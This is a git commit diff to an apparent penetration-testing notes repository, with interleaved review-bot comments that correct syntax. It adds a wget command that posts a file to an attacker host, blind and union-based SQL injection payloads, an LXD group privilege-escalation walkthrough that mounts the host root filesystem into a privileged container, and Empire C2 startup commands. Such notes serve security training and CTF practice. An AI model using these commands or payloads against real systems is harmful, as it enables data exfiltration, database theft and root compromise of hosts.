added stuff

This commit is contained in:
Stefan Friese 2021-09-24 00:54:18 +02:00
parent 7cbcb593a0
commit 3957f28be8
12 changed files with 97 additions and 6 deletions

.gitmodules vendored

@ -31,3 +31,12 @@
[submodule "exploit/web/php/Chankro"] [submodule "exploit/web/php/Chankro"]
path = exploit/web/php/Chankro path = exploit/web/php/Chankro
url = https://github.com/TarlogicSecurity/Chankro.git url = https://github.com/TarlogicSecurity/Chankro.git
[submodule "enumeration/enumeration"]
path = enumeration/enumeration
url = https://github.com/digininja/CeWL.git
[submodule "enumeration/CeWL"]
path = enumeration/CeWL
url = https://github.com/digininja/CeWL.git
[submodule "enumeration/RustScan"]
path = enumeration/RustScan
url = https://github.com/RustScan/RustScan.git
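Review bot: the new `[submodule "enumeration/enumeration"]` entry (path `enumeration/enumeration`) points at the same URL as `[submodule "enumeration/CeWL"]` three lines below, so CeWL is now registered twice under two paths; the first entry reads like a mis-named leftover from an earlier attempt and should be dropped, together with its checkout, so that only `enumeration/CeWL` remains.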

enumeration/CeWL Submodule

@ -0,0 +1 @@
Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d

enumeration/RustScan Submodule

@ -0,0 +1 @@
Subproject commit a444ab66e1d2ce17a3154b7cbe21a221bad97e30

enumeration/docs/cewl.md Normal file

@ -0,0 +1,4 @@
# Cewl
* Wordlist generator from website
* [CeWl repo](https://github.com/digininja/CeWL.git)
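Review bot: the heading `# Cewl` and the link text `CeWl repo` both miscase the project name; use `CeWL`, as the `.gitmodules` entry in this same commit does. The file also has no usage line, unlike `rustscan.md` added alongside it, so a reader has to leave the notes to learn how the tool is invoked.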


@ -0,0 +1,14 @@
# Rustscan
* [Rustscan repo](https://github.com/RustScan/RustScan)
* Config at `$HOME/.rustscan_scripts.toml`
## Usage
```sh
rustscan -r ports -a <Target-ip> -- <nmap cmds>
```
* Using nmap parameters
```sh
rustscan -a 127.0.0.1 -- -A -sC
```
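Review bot: `-r ports` is a misleading placeholder, because `-r`/`--range` takes a numeric port range, so write it as `-r <start>-<end>` (for example `rustscan -a <Target-ip> -r 1-1000 -- <nmap args>`). In the second example `-sC` is redundant next to `-A`, since nmap's `-A` already turns on script scanning along with version and OS detection; drop one of the two so the note does not suggest they are independent.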

@ -0,0 +1 @@
Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d
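Review bot: this subproject pointer records the same commit `3c0e726604c9dc2590a699c89aabeaa0acf9f94d` as `enumeration/CeWL` above, so it is a second checkout of CeWL; it belongs to the stray `enumeration/enumeration` entry in `.gitmodules` and should be removed together with that entry.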


@ -0,0 +1,7 @@
# POST via wget
## Usage
Send file via wget
```
sudo wget --post-file=<fileToExfiltrate> http://<attacker-IP>:<attacker-Port>
```
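Review bot: `sudo` on the `wget --post-file=...` line is unnecessary, since an outbound HTTP POST needs no privileges, and documenting network tools with a reflexive `sudo` is a least-privilege habit worth breaking; drop it. A one-line caveat that the file travels over plain `http://` in cleartext would also help, because that is exactly what makes such a transfer visible to network monitoring on the path.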


@ -34,12 +34,22 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
### Blind injection // Guessing characters ### Blind injection // Guessing characters
```sh ```sh
http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
```
```sh
http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
``` ```
* Function substr(string, start, length) * Function substr(string, start, length)
* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` * sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`
### Union based ### Union based
* _First method__ check by order until error occurs
```sql
' order by 1 -- -
' order by 2 -- -
' order by 3 -- -
```
* __Second method__ fuzzing NULL values, followed by fuzzing data types
* Check number of cols * Check number of cols
```sql ```sql
' UNION SELECT NULL-- ' UNION SELECT NULL--
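Review bot: the new line `http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+` has unbalanced parentheses: the `(select database())` subquery loses its closing parenthesis before `,1,1`, and the outer `(ascii(` is never closed, so the expression will not parse; the corrected line just above it shows the intended nesting, `substr((select database()),1,1)`. Two smaller points in the same hunk: `* _First method__` mixes a single and a double underscore and will not render as bold, so use `__First method__` to match the `__Second method__` line; and the blind examples use MySQL's `database()` while the sqlmap line targets `--dbms=sqlite`, so each snippet should say which DBMS it applies to.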
@ -78,6 +88,9 @@ id=(SELECT banner FROM v$version) # oracle
``` ```
* sqlite specific * sqlite specific
```sql ```sql
' UNION SELECT sql, sql FROM sqlite_master -- -
```
```sql
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable') (SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') (SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
``` ```
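Review bot: `' UNION SELECT sql, sql FROM sqlite_master -- -` hard-codes a two-column union, which only works once the `Check number of cols` step earlier in this file has established that count; say so explicitly, otherwise the line reads as if it were general. The two bare `sqlite_master` subselects beneath it are given without any note on where they are substituted, and `sql NOT NULL` relies on SQLite's postfix form, so a sentence on their intended position and the SQLite-only syntax would make the section self-contained.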


@ -0,0 +1,32 @@
# LXC
## Privilege Escalation
### Member of lxd Group
* [Hackingarticles article](https://www.hackingarticles.in/lxd-privilege-escalation/)
* User has to be in `lxd` group, not necessarily `sudo`.
#### Usage
* Clone and build
```sh
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builde && sudo && ./build alpine
```
* Upload to target
* Import alpine image
```sh
lxc image import ./alpine-v3.14-x86_64-20210920_2132.tar.gz --alias myimage
```
* Prepare image
```sh
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
```
* Host `/` is mounted at `/mnt/root` inside the container
* `root` directory is at `/mnt/root/root`
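Review bot: `cd lxd-alpine-builde && sudo && ./build alpine` does not run as written: the directory name is missing its final `r` (`lxd-alpine-builder`), and `sudo &&` invokes sudo with no command, so the chain fails before the build starts. The builder script in that repository is `build-alpine`, so the line should read `cd lxd-alpine-builder && sudo ./build-alpine`. The filename on the `lxc image import` line carries a build timestamp that changes on every run, so a placeholder such as `alpine-<version>-<date>.tar.gz` is clearer than a literal. For the hardening takeaway, the bullet about `lxd` group membership deserves the explicit statement that, combined with `security.privileged=true` and the `source=/` disk device, it is equivalent to root on the host, which is why membership in that group is worth auditing.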


@ -1,11 +1,20 @@
# Empire C2 # Empire C2
## Parts * [Empire Repo](https://github.com/BC-SECURITY/Empire.git)
* Listeners
* Stagers, payloads generated, for example a reverse, delivery mechanism for agents
* Agents
* Modules use through agents
## Start Client and Server
```sh
poetry run python empire --server --rest --notifications
poetry run python empire.py client
```
## Parts
* __Listeners__ receive connections from stagers
* __Stagers__ payloads generated, for example a reverse, delivery mechanism for agents
* __Agents__ remote on target device tasks
* __Modules__ use modularized payload on agents
* __Credentials__
* __Report__ information on devices
* Results are stored in a DB * Results are stored in a DB
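Review bot: the two start commands disagree on the entry point, `python empire` on the server line and `python empire.py client` on the client line; use the same invocation in both so the pair can be copied as-is. In the rewritten `## Parts` list, `__Agents__ remote on target device tasks` is garbled and should read along the lines of `__Agents__ run tasks on the remote target`, `__Credentials__` has no description at all, and `__Report__ information on devices` does not say what is reported.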